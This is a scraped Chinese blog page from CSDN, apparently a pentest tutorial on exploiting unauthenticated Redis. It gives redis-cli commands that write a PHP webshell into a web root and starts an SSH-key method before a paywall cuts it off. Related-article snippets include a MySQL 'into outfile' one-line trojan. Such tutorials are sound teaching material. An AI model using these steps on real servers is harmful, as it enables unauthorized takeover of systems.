Redis未授权访问漏洞的利用

最新推荐文章于 2022-08-22 22:04:23 发布
最新推荐文章于 2022-08-22 22:04:23 发布
阅读量194 收藏 1
点赞数 1
分类专栏: web 渗透 web渗透 文章标签: web渗透 SQL注入 SQLMAP XSS CSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45983744/article/details/103464498
版权
本文介绍了如何利用Redis未授权访问漏洞进行web渗透。首先通过Redis写入webshell,实现远程代码执行。接着,详细阐述了如何结合SSH key文件,将公钥写入目标Redis服务器,配置目录和文件名,最终保存并实现SSH免密登录目标机器。
摘要由CSDN通过智能技术生成

web渗透学习交流群:811401950

利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”
save
在这里插入图片描述
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述
可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述
Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述
看到生成的文件被

最低0.47元/天 解锁文章
小小秋叶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1321
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1169
危害 信息泄露 系统信息 redis保存的信息 写文件GetShellWeb目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis账号获取webshell实战
weixin_44023460的博客
12-08 763
Redis账号获取webshell实战 1.扫描某目标服务器端口信息 通过nmap对某目标服务器进行全端口扫描,发现该目标开放Redis的端口为3357,默认端口为6379端口,再次通过iis put scaner软件进行同网段服务器该端口扫描,如图1所示,获取两台开放该端口的服务器。 图1扫描同网段开放该端口的服务器 2.使用telnet登录服务器 使用命令“telnet ip port”命令...
redis授权访问
weixin_65219040的博客
06-18 9353
redis
Redis授权漏洞环境搭建复现问题解决
身高两米不到的博客
03-17 670
一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下 环境VMware,两台主机使用NAT模式连接 Kali 192.168.209.129 CentOS7 192.168.209.128 二:CentOS搭建redis,以root权限开启虚机 (1).下载安装包 wget http://download.redis.io/releases/redis-4.0.6.tar.gz 解压 tar -zxvf redis-4.0.6.tar.gz (2).red
Redis 授权访问缺陷
热门推荐
我心如水
06-19 1万+
昨天接到一个开发朋友的求助说是有一个异常的进程占用了将近百分之800(8核)cpu使用率,于是登录服务器查看,确实有一个异常进程,通过ps查到了该进程调用的脚本,继而继续追踪后门定时任务,确实都存在,通过后门定时任务找到了攻击的最终源头,起因便是redis授权漏洞造成,下面公布一下该攻击脚本: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞
周星星的博客
08-22 1515
Redis授权访问漏洞复现以及利用
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4614
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2299
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
Redis授权最全利用方式
swordheart的博客
01-10 2557
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
Redis系列-远程连接redis并给redis加锁
weixin_34342992的博客
03-06 70
假设两台Redis服务器,ip分别为:192.168.1.101和192.168.1.103,如何在101上通过redis-cli访问103上的redis呢?在远程连接103之前,先讲下redis-cli的几个关键参数: 用法:redis-cli [OPTIONS] [cmd [arg [arg ...]]] -h <主机ip>,默认是127.0.0.1 -p <端口&gt...
redis中关于config get、config set与config rewrite
wukong_666的博客
07-22 6130
redis服务器在启动的时候所有参数的设定都是通过缺省或指定的配置文件获取,在这些参数中有些在服务器启动后是无法修改的,但是有些参数则可以通过redis提供的config get和config set实时地获取和修改。 我们可以通过在客户端执行“config get *”这个命令查看参数。 我们可以通过在客户端执行“config set”这个命令来实时修改参数。 但是,用“confi
redis配置不当可直接导致服务器被控制
★匆匆★的专栏
11-14 1905
http://www.secpulse.com/archives/40406.html#respond 预警简述: 2014年的时候安全脉搏首发《利用rediswebshell》《redisshell的小技巧》 近日我们监测到antirez.com曝出redis存在高危安全风险,攻击者利用该风险可直接控制业务服务器,导致被入侵。 目前已监测到攻击者正在利用漏洞攻击
WEB攻防】图片木马的利用
weixin_45983744的博客
02-15 1万+
交流Q群:876554035 一,图片木马原理 图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。 二.工具及环境 DVWA靶场环境 010Editor 中国菜刀 三.具体步骤 1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。 图一 登陆界面 图二 选择安全级别,进入 2.利用01...
SQLMAP获取后台账号密码
weixin_45983744的博客
01-16 5642
QQ交流学习群:811401950 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...
关于SRC漏洞挖掘的经验
weixin_45983744的博客
02-19 4964
交流Q群:876554035 前言 国家在注重安全行业,越来越多的SRC(安全响应中心)成立。在各大平台,比如漏洞盒子,补天,360众测等等都纷纷成立了安全响应中心,许多的企业在上面入驻,给白帽子们提供了一个很好的平台,避免了黑客利用漏洞而造成损失。 一. 资产收集 在挖掘SRC中,我们首先要做的就是确认资产。通常情况下,企业SRC会在项目里给出域名或者域名的范围。我们可以利用一些工具来收集子域名...
phpmyadmin通过日志写入一句话木马
weixin_45983744的博客
12-26 4384
QQ交流群:876554035 1.想通过into outfile写入一句话木马 select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’; 需要知道绝对路径 2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值